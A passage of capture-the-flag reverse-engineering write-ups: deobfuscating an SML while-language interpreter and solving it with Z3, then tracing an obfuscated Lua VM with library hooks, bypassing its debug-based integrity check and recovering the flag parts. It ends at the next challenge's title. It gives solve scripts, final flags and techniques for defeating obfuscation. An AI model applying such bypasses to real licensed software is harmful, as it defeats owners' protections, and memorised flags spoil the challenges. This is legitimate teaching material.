		Skip => E
		| Seq (lll,llll) => evalProgram(evalProgram(E, lll), llll)
		| Assign (lllll, llllll) => (lllll, evalExp(E,llllll)) :: E
		| If (lllllll, llllllll, lllllllll) => if evalBool(E, lllllll) then evalProgram(E, llllllll) else evalProgram(E, lllllllll)
		| While (lllllll, lll) => if evalBool(E, lllllll) then evalProgram(E, Seq(lll, ll)) else E
		| type_3_7 lll => evalProgram(E, lll)
		| type_3_6 => E;

Now, stepping into the next functions, we find that they behave similarly but also incorporate throw and callcc. A quick search reveals that these are continuation primitives. Examining their implementation, we determine that the function executes an instruction and then returns, except for the last two cases:

One case executes all the instructions it contains.
The other returns itself.

At this point, it is useful to see where this function is called. We find that it is invoked by llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll, which is simply a wrapper around callcc, and that this, in turn, is called by lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll. In the latter function, after calling the wrapper on the first element of the type_4 parameter, additional operations are performed.

Examining type_4, we observe that it is simply a list of Program elements. Given that we are dealing with a list of programs, where only one instruction is executed at a time, we can make an educated guess:

It resembles a basic threading system.

Supporting this hypothesis, we see that one function checks whether the next instruction (ignoring sequence wrappers) is a block operation. It iterates over all programs, verifying if they are at the same block operation or at the end of the list. Thus, the block operation likely serves as a barrier or synchronization mechanism.

Further analysis of the remaining functions confirms this assumption.

datatype Program = Skip | Seq of Program * Program | Assign of string * Exp | If of Bool * Program * Program | While of Bool * Program | Sync | Crit of Program;
datatype Thread = Null | Th of Program * Thread;

In conclusion, we can define the final types as follows:

Program, representing the sequence of operations, including assignment, loops, and synchronization primitives.
Thread, representing individual execution flows. This allows us to fully analyze the execution environment and understand how the program processes the final, single-line command at the end of the file.

Reverse of the Main Logic

Now that we have deobfuscated the program is time to understand what is actually doing into the executed section; for this we will use a script to help us with the names. First we start with the list of names that we found previosly:

datatype Exp = Const of int | Var of string | Sum of Exp * Exp | Sub of Exp * Exp | Mul of Exp * Exp | Div of Exp * Exp;
datatype Bool = True | False | And of Bool * Bool | Or of Bool * Bool | Not of Bool | Eq of Exp * Exp | Gt of Exp * Exp | Lt of Exp * Exp;
datatype Program = Skip | Seq of Program * Program | Assign of string * Exp | If of Bool * Program * Program | While of Bool * Program | Sync | Crit of Program;
datatype Thread = Null | Th of Program * Thread;

EXP =	'lllllllllllllllllllllllllllllll'
CONST =	'llllllllllllllllllllllllllllllll'
VAR =	'lllllllllllllllllllllllllllllllll'
SUM =	'llllllllllllllllllllllllllllllllll'
SUB =	'lllllllllllllllllllllllllllllllllll'
MUL =	'llllllllllllllllllllllllllllllllllll'
DIV =	'lllllllllllllllllllllllllllllllllllll'

BOOL =	'llllllllllllllllllllllllllllllllllllll'
TRUE =	'lllllllllllllllllllllllllllllllllllllll'
FALSE =	'llllllllllllllllllllllllllllllllllllllll'
AND =	'lllllllllllllllllllllllllllllllllllllllll'
OR =	'llllllllllllllllllllllllllllllllllllllllll'
NOT =	'lllllllllllllllllllllllllllllllllllllllllll'
EQ =	'llllllllllllllllllllllllllllllllllllllllllll'
GT =	'lllllllllllllllllllllllllllllllllllllllllllll'
LT =	'llllllllllllllllllllllllllllllllllllllllllllll'

PROGRAM =	'lllllllllllllllllllllllllllllllllllllllllllllll'
SKIP =		'llllllllllllllllllllllllllllllllllllllllllllllll'
SEQ =		'lllllllllllllllllllllllllllllllllllllllllllllllll'
ASSIGN =	'llllllllllllllllllllllllllllllllllllllllllllllllll'
IF =		'lllllllllllllllllllllllllllllllllllllllllllllllllll'
WHILE =		'llllllllllllllllllllllllllllllllllllllllllllllllllll'
SYNC =		'lllllllllllllllllllllllllllllllllllllllllllllllllllll'
CRIT =		'llllllllllllllllllllllllllllllllllllllllllllllllllllll'

THREAD =	'lllllllllllllllllllllllllllllllllllllllllllllllllllllll'
NULL =		'llllllllllllllllllllllllllllllllllllllllllllllllllllllll'
TH =		'lllllllllllllllllllllllllllllllllllllllllllllllllllllllll'

operations = {
	EXP: 'Exp',
	CONST: 'Const',
	VAR: 'Var',
	SUM: 'Sum',
	SUB: 'Sub',
	MUL: 'Mul',
	DIV: 'Div',

	BOOL: 'Bool',
	TRUE: 'True',
	FALSE: 'False',
	AND: 'And',
	OR: 'Or',
	NOT: 'Not',
	EQ: 'Eq',
	GT: 'Gt',
	LT: 'Lt',

	PROGRAM: 'Program',
	SKIP: 'Skip',
	SEQ: 'Seq',
	ASSIGN: 'Assign',
	IF: 'If',
	WHILE: 'While',
	SYNC: 'Sync',
	CRIT: 'Crit',

	THREAD: 'Thread',
	NULL: 'Null',
	TH: 'Th',
}

Now we can replace the obfuscated names with their correct ones:

start = 'val lll = '
ast = code[179][len(start):-1]

subs = sorted(operations.items(), reverse=True)

for sub, name in subs:
	ast = ast.replace(sub, name)

flag_chars = [f'"{ "l" * (i+1) }"' for i in range(29)]
for i in range(len(flag_chars)-1, -1, -1):
	ast = ast.replace(flag_chars[i], f'"c_{i}"')
ast = ast.replace('l' * 30, f'correct')

If we print the AST, we can now see what the program is doing. The first step is to split the threads so they can be analyzed separately. After splitting, we observe that each thread performs operations of the same type, except for the last one, which is slightly longer. We will analyze it later.

The blocks perform mathematical operations on each flag character, one time for character per block. Additionally, we notice syncs and crits, which indicate that the threads are executed in rounds as follows: [t1] -> [t2] -> [t3, t4, t5, t6] -> [t7] -> [t8] -> [t9]. Only the third group of threads runs in parallel. However, after analyzing the mathematical operations they perform, we see that they consist solely of addition and subtraction, meaning we can serialize them.

Now that we understand what each thread does and when it executes (except for the last one), we can extract the values from these blocks:

blocks = ast.split('Th')[1:]

def extract_from_block(block):
	values = {}
	splitted_block = block.split('Var "')
	for i in range(1, len(splitted_block)):
		var, val = splitted_block[i].split(')')[0].split('", Const ')
		var = int(var.split('_')[1])
		values[var] = int(val)
	return values

layers = []
for i in range(len(blocks) - 1):
	layers.append(extract_from_block(blocks[i]))

For the last block, we observe many if statements. We can split them to analyze their purpose. Most of them assign the correct value based on previous conditions. After filtering these out, we are left with many multiplications, sums, and comparisons. After analyzing the logic, we find that each if statement represents an equation where the unknowns are the characters of the flag. Since we have multiple equations, we can solve them using Z3.

First, we filter out the equations:

last_block = [check for check in blocks[-1].split('If') if 'correct' not in check][1:]

Next, we write an equation extractor for the remaining statements:

def extract_equation(block):
	tmp = block.split('Mul')[1:]
	values = {}
	for i, mul in enumerate(tmp):
		mul = mul[len('(Const '):]
		val, var = mul.split('Var "')
		var = var.split('")')[0]
		if val[0] == '(':
			val = - int(val.split(' - ')[1][:-3])
		else:
			val = int(val[:-2])
		if i == (len(tmp)-1):
			const = mul.split('Const ')[1][:-3]
			if const[0] == '(':
				const = - int(const.split(' - ')[1][:-1])
			else:
				const = int(const)
		var = int(var.split('_')[1])
		values[var] = val
	return values, const

Now, we extract all equations and feed them into the Z3 solver:

from z3 import *

flag_chars = [BitVec(f'c_{i}', 16) for i in range(29)]
s = Solver()

for sub_block in last_block:
	values, const = extract_equation(sub_block)
	equation = 0
	for var, val in values.items():
		equation += val * flag_chars[var]
	s.add(equation == const)

Then, we check if a valid solution exists:

print('Checking...')
if s.check() == sat:
	print('Sat')
	m = s.model()
	flag = [m[c].as_long() for c in flag_chars]
else:
	print('Unsat')
	exit(1)

With the system solved, we can retrieve the operations from previous threads:

SUM = 0
SUB = 1
MUL = 2
signs = [SUM, MUL, SUB, SUM, SUB, SUB, MUL, SUM]

And invert them:

for i in range(len(layers)-1, -1, -1):
	sign = signs[i]
	if sign == SUM:
		for var, val in layers[i].items():
			flag[var] -= val
	elif sign == SUB:
		for var, val in layers[i].items():
			flag[var] += val
	elif sign == MUL:
		for var, val in layers[i].items():
			flag[var] //= val
	else:
		print('Error')
		exit(1)

Finally, we cast the flag and win:

print(flag)
print(bytes(flag))

Final Solve Scipt

file = 'dist/LLL.sml'
with open(file, 'r') as f:
	code = f.read().split('\n')

'''
datatype Exp = Const of int | Var of string | Sum of Exp * Exp | Sub of Exp * Exp | Mul of Exp * Exp | Div of Exp * Exp;
datatype Bool = True | False | And of Bool * Bool | Or of Bool * Bool | Not of Bool | Eq of Exp * Exp | Gt of Exp * Exp | Lt of Exp * Exp;
datatype Program = Skip | Seq of Program * Program | Assign of string * Exp | If of Bool * Program * Program | While of Bool * Program | Sync | Crit of Program;
datatype Thread = Null | Th of Program * Thread;
'''

EXP =	'lllllllllllllllllllllllllllllll'
CONST =	'llllllllllllllllllllllllllllllll'
VAR =	'lllllllllllllllllllllllllllllllll'
SUM =	'llllllllllllllllllllllllllllllllll'
SUB =	'lllllllllllllllllllllllllllllllllll'
MUL =	'llllllllllllllllllllllllllllllllllll'
DIV =	'lllllllllllllllllllllllllllllllllllll'

BOOL =	'llllllllllllllllllllllllllllllllllllll'
TRUE =	'lllllllllllllllllllllllllllllllllllllll'
FALSE =	'llllllllllllllllllllllllllllllllllllllll'
AND =	'lllllllllllllllllllllllllllllllllllllllll'
OR =	'llllllllllllllllllllllllllllllllllllllllll'
NOT =	'lllllllllllllllllllllllllllllllllllllllllll'
EQ =	'llllllllllllllllllllllllllllllllllllllllllll'
GT =	'lllllllllllllllllllllllllllllllllllllllllllll'
LT =	'llllllllllllllllllllllllllllllllllllllllllllll'

PROGRAM =	'lllllllllllllllllllllllllllllllllllllllllllllll'
SKIP =		'llllllllllllllllllllllllllllllllllllllllllllllll'
SEQ =		'lllllllllllllllllllllllllllllllllllllllllllllllll'
ASSIGN =	'llllllllllllllllllllllllllllllllllllllllllllllllll'
IF =		'lllllllllllllllllllllllllllllllllllllllllllllllllll'
WHILE =		'llllllllllllllllllllllllllllllllllllllllllllllllllll'
SYNC =		'lllllllllllllllllllllllllllllllllllllllllllllllllllll'
CRIT =		'llllllllllllllllllllllllllllllllllllllllllllllllllllll'

THREAD =	'lllllllllllllllllllllllllllllllllllllllllllllllllllllll'
NULL =		'llllllllllllllllllllllllllllllllllllllllllllllllllllllll'
TH =		'lllllllllllllllllllllllllllllllllllllllllllllllllllllllll'

operations = {
	EXP: 'Exp',
	CONST: 'Const',
	VAR: 'Var',
	SUM: 'Sum',
	SUB: 'Sub',
	MUL: 'Mul',
	DIV: 'Div',

	BOOL: 'Bool',
	TRUE: 'True',
	FALSE: 'False',
	AND: 'And',
	OR: 'Or',
	NOT: 'Not',
	EQ: 'Eq',
	GT: 'Gt',
	LT: 'Lt',

	PROGRAM: 'Program',
	SKIP: 'Skip',
	SEQ: 'Seq',
	ASSIGN: 'Assign',
	IF: 'If',
	WHILE: 'While',
	SYNC: 'Sync',
	CRIT: 'Crit',

	THREAD: 'Thread',
	NULL: 'Null',
	TH: 'Th',
}

############################## DEOBFUSCATION ##############################

start = 'val lll = '
ast = code[179][len(start):-1]

subs = sorted(operations.items(), reverse=True)

for sub, name in subs:
	ast = ast.replace(sub, name)

flag_chars = [f'"{ "l" * (i+1) }"' for i in range(29)]
for i in range(len(flag_chars)-1, -1, -1):
	ast = ast.replace(flag_chars[i], f'"c_{i}"')
ast = ast.replace('l' * 30, f'correct')

############################## OPERATION BLOCKS SPLIT ##############################

blocks = ast.split('Th')[1:]

def extract_from_block(block):
	values = {}
	splitted_block = block.split('Var "')
	for i in range(1, len(splitted_block)):
		var, val = splitted_block[i].split(')')[0].split('", Const ')
		var = int(var.split('_')[1])
		values[var] = int(val)
	return values

layers = []
for i in range(len(blocks) - 1):
	layers.append(extract_from_block(blocks[i]))

############################## EQAUATION SYSTEM SOLVING ##############################

def extract_equation(block):
	tmp = block.split('Mul')[1:]
	values = {}
	for i, mul in enumerate(tmp):
		mul = mul[len('(Const '):]
		val, var = mul.split('Var "')
		var = var.split('")')[0]
		if val[0] == '(':
			val = - int(val.split(' - ')[1][:-3])
		else:
			val = int(val[:-2])
		if i == (len(tmp)-1):
			const = mul.split('Const ')[1][:-3]
			if const[0] == '(':
				const = - int(const.split(' - ')[1][:-1])
			else:
				const = int(const)
		var = int(var.split('_')[1])
		values[var] = val
	return values, const


last_block = [check for check in blocks[-1].split('If') if 'correct' not in check][1:]


from z3 import *

flag_chars = [BitVec(f'c_{i}', 16) for i in range(29)]
s = Solver()

for sub_block in last_block:
	values, const = extract_equation(sub_block)
	# print(values, const)
	equation = 0
	for var, val in values.items():
		equation += val * flag_chars[var]
	s.add(equation == const)

print('Checking...')
if s.check() == sat:
	print('Sat')
	m = s.model()
	flag = [m[c].as_long() for c in flag_chars]
else:
	print('Unsat')
	exit(1)

############################## INVERTING BLOCKS ##############################

SUM = 0
SUB = 1
MUL = 2
signs = [SUM, MUL, SUB, SUM, SUB, SUB, MUL, SUM]

for i in range(len(layers)-1, -1, -1):
	sign = signs[i]
	if sign == SUM:
		for var, val in layers[i].items():
			flag[var] -= val
	elif sign == SUB:
		for var, val in layers[i].items():
			flag[var] += val
	elif sign == MUL:
		for var, val in layers[i].items():
			flag[var] //= val
	else:
		print('Error')
		exit(1)

############################## FLAG ##############################

print(flag)
print(bytes(flag))

Flag

TRX{while_language_is_funny}

TRX CTF 25 - lost

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Challenge Description

I once had a license for this script, but now all I have left is myself; just me and only me. I won’t get lost.. …

Lost Overview

We are given a lost.lua script. A quick glance reveals that the script is obfuscated, and the input flag is defined as a global variable at the top (e.g., FLAG=TRX{goodluck_...}). According to the challenge description, this flag represents our license key.

To ensure the script works with various Lua versions, I tested it using different interpreters, including luau and luajit 2.1.0:

$$\                       $$\
$$ |                      $$ |
$$ | $$$$$$\   $$$$$$$\ $$$$$$\
$$ |$$  __$$\ $$  _____|\_$$  _|
$$ |$$ /  $$ |\$$$$$$\    $$ |
$$ |$$ |  $$ | \____$$\   $$ |$$\
$$ |\$$$$$$  |$$$$$$$  |  \$$$$  |
\__| \______/ \_______/    \____/

this flag is weird, try again!
[never exit]

The script runs correctly on these interpreters, so we can proceed with examining its output.

It seems that the script does not like the default flag. I even tried running it without setting a flag:

...
Make sure to set the FLAG variable before running the challenge!
Ex: FLAG = 'TRX{goodluck}';

At the end of the script, there is a long encoded string that appears to be compressed data used during execution. For now, we treat it as bytecode

Lost First Analysis

Before diving into the complexities of lost, we set up a proper environment for analysis. The first step is to beautify the script.

There are many tools available online or on GitHub
for example: lua-beautifier.

Now when making sure that the script still work we will notice that executing the beautified version doesn’t give us the expected output, at this point we need to figure out wheter is the beautified output problem or script integrity check…

I tried a simple modification by extending the second line (for example, to 200). Running the script still produced the same behavior, confirming that an integrity check is indeed in place.

Returning to the beautified script..

Next, we set up a hook library to trace which library functions are used and where:

local dbg_getinfo = debug.getinfo;
local str_format = string.format;
local tbl_foreach = table.foreach;

local function hook_library(library_name, meta_methods)
    local old_library = _G[library_name];
    local new_mt = {};
    new_mt.__old = old_library;
    new_mt.__name = library_name;
    for k, v in pairs(meta_methods) do
        new_mt[k] = v;
    end;
    _G[library_name] = setmetatable({}, new_mt)
end;

local general_meta_logger = {
    __index = function(self, idx)
        local mt = getmetatable(self);
        local index_line = dbg_getinfo(2).currentline;
        print(str_format("__index: %s; index: %s from line %d", mt.__name, idx, index_line));
        local value = mt.__old[idx];
        return value;
    end;
    __newindex = function(self, idx, value)
        local mt = getmetatable(self);
        print(str_format(
            "__newindex: %s; index: %s; old value: %s, value: %s from line %d",
            mt.__name, idx, mt.__old[idx], value, dbg_getinfo(2).currentline
        ));
        mt.__old[idx] = value;
    end;
}

-- hooks
hook_library("debug", general_meta_logger)
hook_library("string", general_meta_logger)
hook_library("math", general_meta_logger)
hook_library("table", general_meta_logger)
hook_library("io", general_meta_logger)
hook_library("os", general_meta_logger)
hook_library("coroutine", general_meta_logger)

Note: This hook method works on LuaJIT but not on Luau, which enforces strict sandbox rules that prevent overwriting libraries.

The hook output reveals interesting logs:

__index: table; index: concat from line 59
__index: math; index: ldexp from line 60
__index: table; index: insert from line 68
__index: debug; index: getinfo from line 457
__index: debug; index: getinfo from line 1887

It appears the script uses debug.getinfo to retrieve context information. Although we could further hook debug.getinfo to see which fields are accessed, but only currentline, lastlinedefined, and linedefined are relevant for the integrity check.

By removing debug.getinfo via our hook, we notice the script attempting to use debug.traceback. At this point, we undefine debug library to see how the script behaves:

-- FLAG = "...
-- one of those two methods is fine
_G["debug"] = nil;
debug = nil
-- script...

Running the beautified script now works flawlessly.

Note: The script doesn’t crash if the debug library is missing, that’s for env compatibility reasons.

Beautifier Check Logic

Here is the reconstructed integrity check logic:

if debug then
    if debug.getinfo(1).currentline > 100 or tonumber(debug.traceback():match(':(%d+)')); then
        -- CRASH();
    end;
end

At this point, I searched for a while true do loop and, unsurprisingly, found one. This strongly suggests that the script implements a VM cycle that executes instructions:

while true do
    c = l[e]
    t = c.H
    if t <= 101 then
        if t <= 50 then
            if t <= 24 then
                if t <= 11 then
                    if t <= 5 then
                        if t <= 2 then
                            if t <= 0 then
                                local i
                                local t
                                -- mov operation on stack
                                S[c.c] = S[c.S]
                                -- increasing pc
                                e = e + 1
                                -- changing current instruction
                                c = l[e]

Instructions seem to be located using a binary search, and there are two types of program counters: one for retrieving instruction data (instruction pc) and one for locating the instruction operation (instruction vmpc).

Lost VM Analysis

Based on our observations, we expect the script to deserialize bytecode and load constants and instructions.

Scrolling up in the main VM cycle, we find the following logic:

for l = 1, c do
    local e = i()
    local c
    -- deserialize constants based on types
    if (e == 0) then
        c = (i() ~= 0)
    elseif (e == 3) then
        c = r()
    elseif (e == 2) then
        c = h()
    end
    -- store constants
    S[l] = c
end
for c = 1, e() do
    -- recursively deserialize protos inside the current proto
    t[c - 1] = Q()
end
l.d = i()
for l = 1, e() do
    local S = i()
    local c = {H = n(), c = n(), nil, nil}
    -- deserialize instructions based on instruction type
    -- like: iABC, iABx, iAsBx, etc
    if (S == 0) then
        c.S = n()
        c.N = n()
    elseif (S == 1) then
        c.S = e()
    elseif (S == 2) then
        c.S = e() - (2 ^ 16)
    elseif (S == 3) then
        c.S = e() - (2 ^ 16)
        c.N = n()
    end
    -- store instruction
    o[l] = c
end

Lost VM First Check

Our hook system revealed an interesting log from the VM cycle:

__index: table; index: insert from line 459

At this point we improve the hook system to also hook library functions by doing so:

-- ...
__index = function(self, idx)
    local mt = getmetatable(self);
    local index_line = dbg_getinfo(2).currentline;
    print(str_format("__index: %s; index: %s from line %d", mt.__name, idx, index_line));
    local value = mt.__old[idx];

    -- target VM Instructions
    if index_line > 277 then
        if type(value) == "function" then
            return function(...)
                local call_line = dbg_getinfo(2).currentline;
                local func_name = mt.__name .. "." .. idx;
                -- we ignore string.sub and string.char
                if func_name == "string.sub" or func_name == "string.char" then
                    return value(...);
                end
                print("-----------VM CALL-----------")
                print(str_format("%s called from %d args: ", func_name, call_line))
                print(...)
                print("-----------------------------")
                return value(...);
            end;
        end
    end;

    return value;
end;
-- ...

By running the beautified script again we get the following logs:

-----------VM CALL-----------
table.insert called from 3725 args:
table: 0x010e2258       goodluck
-----------------------------
__index: table; index: insert from line 478
-----------VM CALL-----------
table.insert called from 3725 args:
table: 0x010e2258       aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3BSSEw0V1dF
-----------------------------

It seem like the script is inserting flag parts splitted by _ inside a table, we will call this table flag_parts

Let’s hook flag_parts to figure out where it is getting used

if t == 183 then
    -- vmpc 183
    local e = c.c
    local args = {o(S, e + 1, c.S)}
    local arg1, arg2 = args[1], args[2]
    if type(arg1) == 'table' and type(arg2) == "string" and getmetatable(arg1) == nil then
        setmetatable(arg1, {
            __storage = {},
            __index = function (self, idx)
                local idx_line = dbg_getinfo(2).currentline
                print(
                    str_format("access to flag_parts[%d] from %d", idx, idx_line)
                )
                local mt = getmetatable(self)
                local st = mt.__storage;
                return st[idx];
            end,
            __newindex = function(self, idx, value)
                local mt = getmetatable(self)
                local st = mt.__storage;
                st[idx] = value;
            end,
            __len = function(self)
                local mt = getmetatable(self)
                local st = mt.__storage;
                local idx_line = dbg_getinfo(2).currentline
                print(
                    str_format("#flag_parts detected from %d", idx_line)
                )
                return #st;
            end
        })
    end
    local mt = getmetatable(arg1)
    if mt then
        -- aka table.insert on our storage
        S[e](mt.__storage, arg2)
    else
        S[e](o(S, e + 1, c.S))
    end
end

With this new hook in place we can find where operations on flag_parts are coming:

log: #flag_parts detected from 1214

Going to line 1214 in my beautified script I find the following instruction:

if t <= 44 then
    -- vmpc 44
    S[c.c] = #S[c.S]
end

We can look for the next instruction vmpc by incrementing the pc

we expect it to be a check on the len(flag_parts)

if t <= 44 then
    -- vmpc 44
    S[c.c] = #S[c.S]
    local next_inst = l[e + 1]
    local next_vmpc = next_inst.H
    print("#flag_parts next vmpc " .. tostring(next_vmpc))
end

log: #flag_parts next vmpc 35

Now let’s look at vmpc 35

else
    -- vmpc 35
    if (S[c.c] == n[c.N]) then
        e = e + 1
    else
        e = c.S
    end
end

Wow we discovered an equality check: S[c.c] == n[c.N]. Let’s examine the operand values:

S[c.c] = 2;
n[c.N] = 4;`

Now to confirm this check we could patch vmpc 35 or just add two more parts to our flag..

Lost VM Part 1

By changing FLAG to 'TRX{good_luck_test_aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3BSSEw0V1dF}';, We notice a new output from the script, which indicates that we have successfully moved on to another check!

access to flag_parts[1] from 478
...
3 characters, 3 bytes... easy right?

which we can approach as the same way we used:

elseif t == 10 then
    -- vmpc 10
    S[c.c] = S[c.S][n[c.N]]
    local next_inst = l[e + 1]
    local next_vmpc = next_inst.H
    print("flag_parts[1] next vmpc " .. next_vmpc) -- vmpc 44
else

We notice vmpc 10 is getting the first flag part and then getting its len from vmpc 44 and then move to vmpc 132

else
    -- vmpc 132
    print("vmpc 132", S[c.c], "~=", n[c.N]) -- vmpc 132        4       ~=      3
    if (S[c.c] ~= n[c.N]) then
        e = e + 1
    else
        e = c.S
    end
end

Thanks to this check we can confirm the first flag part need to be 3 bytes long

New output:

...
do you like xor?

It seem we are not getting any interesting log and we need a new approach to figure out what is going on with the first flag part

Let’s log all unique vmpc that are getting executed when a special flag is toggled on

local log_current_function = false;
local logged_instructions = {}
while true do
    c = l[e]
    t = c.H
    if log_current_function and logged_instructions[t] == nil then
        print(str_format("%s: pc %d\tvmpc %d", dbg_getinfo(1).func, e, t))
        logged_instructions[t] = true;
    end
    -- ...

Let’s toggle log_current_function from vmpc 132

if (S[c.c] ~= n[c.N]) then
    e = e + 1
else
    e = c.S
    log_current_function = true;
end

vmpc 132        3       ~=      3
function: 0x010c61d0: pc 1436   vmpc 99
function: 0x010c61d0: pc 1437   vmpc 73
function: 0x010c61d0: pc 1439   vmpc 152
function: 0x010c61d0: pc 1445   vmpc 32
function: 0x010c61d0: pc 1447   vmpc 1
function: 0x010c61d0: pc 1454   vmpc 2
function: 0x010c61d0: pc 1466   vmpc 54
function: 0x010c61d0: pc 1467   vmpc 0
function: 0x010c61d0: pc 1478   vmpc 56
__index: string; index: sub from line 1369
__index: string; index: char from line 1375
function: 0x010c61d0: pc 1495   vmpc 121
...
function: 0x010c61d0: pc 1574   vmpc 114
do you like xor?

From this log output we can notice how string.index and string.sub are used just before the script freezes. For this reason we inspect vmpc 0 and 56, the vmpcs likely causing the VM to jump to the crash function.

-- ...
if t <= 0 then
    -- vmpc 0
    -- ...
    c = l[e]
    t = c.c
    S[t] = S[t](o(S, t + 1, c.S)) -- xor8(flag_parts[1][1], 42)
    e = e + 1
    c = l[e]
    S[c.c] = n[c.S]
    e = e + 1
    c = l[e]
    t = c.c
    S[t] = S[t](o(S, t + 1, c.S)) -- bit32_test(flag_parts[1][1] ^ 42, 0x46)
    -- x ^ 42 = 70 -> x = 'l' flag_parts[1][1] == 'l'
    e = e + 1
    c = l[e]
    -- we can also change this to check if we bypass the check
    if not S[c.c] then
        e = e + 1
    else
        e = c.S
    end
elseif t == 1 then
-- ...

We can now change the first part character to l and from the new output we can see we moved to another check:

function: 0x010c6ea8: pc 1578   vmpc 79
function: 0x010c6ea8: pc 1591   vmpc 56
__index: string; index: sub from line 1370
__index: string; index: char from line 1376
....
bitwise operations are fun!

At this point we can go check vmpc 79

-- vmpc 79
-- ...
e = e + 1
c = l[e]
t = c.c
S[t] = S[t](o(S, t + 1, i)) -- check if flag_parts[1][2] == "a"
-- print(o(S, t + 1, i)) -- 97 => "a"
-- this will make the vm jmp to the next check
S[t] = true

New output after changing first part second character to a:

...
function: 0x00ec6e68: pc 1692   vmpc 204
function: 0x00ec6e68: pc 1700   vmpc 56
__index: string; index: sub from line 1370
__index: string; index: char from line 1376
...
xor $r1, $r1 for the win!

-- vmpc 204
-- ...
S[t] = S[t](o(S, t + 1, c.S))
e = e + 1
c = l[e]
S[c.c] = n[c.S]
e = e + 1
c = l[e]
t = c.c
S[t] = S[t](o(S, t + 1, c.S))
-- print(o(S, t + 1, c.S)) -- flag_parts[1][3] == '4'
e = e + 1
c = l[e]
if (S[c.c] ~= n[c.N]) then -- flag_parts[1][3] check
-- ...

The first flag part is lu4!

Lost VM Part 2

With the updated flag, the crash message changes to:

...
#flag_parts next vmpc 116
function: 0x010b6dd8: pc 1815   vmpc 116
function: 0x010b6dd8: pc 1818   vmpc 56
__index: string; index: sub from line 1370
__index: string; index: char from line 1376
...
sorry, you can't spell magic

This corresponds to vmpc 116:

Remember vmpc 116 ;)

elseif t > 115 then
    -- vmpc 116
    if e == 1815 then
        -- 1815 => check if #flag_parts[2] == 8
        print("vmpc 116", S[c.c], "~=", S[c.N], e)
    end
    if (S[c.c] ~= S[c.N]) then
        e = e + 1
    else
        e = c.S
    end
else

Since vmpc is frequently used we need to filter its logs based on pc

Thanks to #flag_parts log and vmpc 116 we know we are checking #flag_parts[2] == 8

The new output:

function: 0x00eb6b28: pc 1923   vmpc 93
function: 0x00eb6b28: pc 1936   vmpc 56
__index: string; index: sub from line 1370
__index: string; index: char from line 1376
...
#flag_parts next vmpc 163
-----------VM CALL-----------
string.format called from -1 args:
0x%04X  1
-----------------------------
you are not a wizard 0x0001

Let’s look at vmpc 93

elseif t == 93 then
    -- vmpc 93
    local is_1933 = e == 1933
    local i
    local t
    t = c.c
    i = S[c.S]
    S[t + 1] = i
    S[t] = i[n[c.N]]
    e = e + 1
    c = l[e]
    S[c.c] = S[c.S]
    e = e + 1
    c = l[e]
    t = c.c
    S[t] = S[t](o(S, t + 1, c.S))
    -- return value is the char at index arg2 inside flag_parts[2]
    -- we notice flag_parts[2] getting printed with a value that seem an index
    -- print(S[t], o(S, t + 1, c.S))
    e = e + 1
    c = l[e]
    S[c.c] = n[c.S]
    e = e + 1
    c = l[e]
    S[c.c] = S[c.S] - S[c.N] -- (idx-1)
    e = e + 1
    c = l[e]
    S[c.c] = n[c.S]
    e = e + 1
    c = l[e]
    S[c.c] = S[c.S] % S[c.N] -- (idx-1) % 3
    e = e + 1
    c = l[e]
    S[c.c] = S[c.S][S[c.N]] -- key[(idx-1) % 3]
    -- dump xor key
    local part2_key = ""
    for i=0, #S[c.S] do
        part2_key = part2_key .. tostring(S[c.S][i]) .. ", "
    end
    print(part2_key)
    e = e + 1
    c = l[e]
    t = c.c
    S[t] = S[t](o(S, t + 1, c.S)) -- xor(flag_parts[2][idx] ^ key)
    e = e + 1
    c = l[e]
    S[c.c] = S[c.S][S[c.N]]
    -- dump the xor result
    local part2_xored = "";
    for i=1, #S[c.S] do
        part2_xored = part2_xored .. tostring(S[c.S][i]) .. ", "
    end
    print(part2_xored)
else

After dumping part2_xored and part2_key we can write a simple solve script

xored = [189, 19, 122, 254, 80, 100, 184, 91]
key = [202, 34, 0]

for i in range(len(xored)):
    xored[i] ^= key[i % len(key)]

print(
    ('').join(map(chr, xored))
)

output: w1z4rdry

Lost VM Part 3

By using the new flag the crash message change to:

...
#flag_parts next vmpc 163
function: 0x010c6820: pc 2048   vmpc 56
__index: string; index: sub from line 1370
__index: string; index: char from line 1376
...
you know what to do now

It seem like that after retriving #flag_parts[3] we are not logging the vmpc responsible to perform the check, this is because logged_instructions saturated and we need to reset it in order to log again reused vmpcs

Let’s check vmpc 116

elseif t > 115 then
-- vmpc 116
if e == 1815 then
    -- 1815 => check if #flag_parts[2] == 8
    print("vmpc 116", S[c.c], "~=", S[c.N], e)
end
print(e, S[c.c], "~=", S[c.N])

From the new output we can notice vmpc 116 begin used at pc 2045 to check #flag_parts[3] == 8

access to flag_parts[3] from 2131
#flag_parts next vmpc 163
2045    4       ~=      8
function: 0x010b6a28: pc 2048   vmpc 56

elseif t > 115 then
    -- vmpc 116
    if e == 1815 or e == 2045 then
        -- 1815 => check if #flag_parts[2] == 8
        -- 2045 => check if #flag_parts[3] == 8
        print("vmpc 116", S[c.c], "~=", S[c.N], e)
        logged_instructions = {}; -- reset log blacklist
    end

#flag_parts next vmpc 163
function: 0x00ec66c0: pc 2733   vmpc 197
__index: string; index: sub from line 1370
__index: string; index: char from line 1376
#flag_parts next vmpc 163
function: 0x00ec66c0: pc 2836   vmpc 114
tables metamethods are fun!

By looking at 197 we approach this part by inspecting the stack:

-- vmpc 197
-- ...
S[t] = S[t](o(S, t + 1, c.S)) -- flag_parts[3]:sub(7, 8)
e = e + 1
c = l[e]
-- print(S[c.N]) -- flag_parts_3:sub(7, 8)
-- flag table must be on stack with a metatable
for i, v in next, S do
    if type(v) == 'table' and getmetatable(v) then
        print("---------TALBE_WITH_METAMETHODS---------")
        tbl_foreach(v, print) -- we can reconstruct part3 easily
        print("----------------------------------------")
        -- m4573r3d
        logged_instructions = {}
    end
end
if (S[c.c] ~= S[c.N]) then
-- ...

From output:

---------TALBE_WITH_METAMETHODS---------
1       57
2       m4
3       3d
4       3r
----------------------------------------

reconstructed: m4573r3d

YOU MADE IT! HERE IS YOUR FLAG: TRX{lu4_w1z4rdry_m4573r3d_aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3BSSEw0V1dF}

TRX CTF 25 - Molly

